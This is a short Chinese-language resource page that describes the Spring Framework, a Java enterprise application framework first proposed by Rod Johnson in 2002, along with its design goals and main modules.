Spring框架(Spring Framework)是由Rod Johnson于2002年提出的开源Java企业级应用框架,旨在通过使用JavaBean替代传统EJB实现方式降低企业级编程开发的复杂性。该框架基于简单性、可测试性和松耦合性设计理念,提供核心容器、应用上下文、数据访问集成等模块,支持整合Hibernate、Struts等第三方框架,其适用范围不仅限于服务器端开发,绝大多数Java应用均可从中受益。

时间: 2025-12-13 大小: 5MB 下载: 0次
热门标签
Kubernetes SpringCloud DeepSeek Rocky HarmonyOS6 SpringBoot4 Nacos3 Service Mesh OpenAi Jdk25 Gemini3 Redis Docker

欢迎您!

登录后,您将获得更多功能!

热门文章
联系我们

有任何问题或合作意向欢迎联系我们

Email: 99873273@qq.com

QQ: 99873273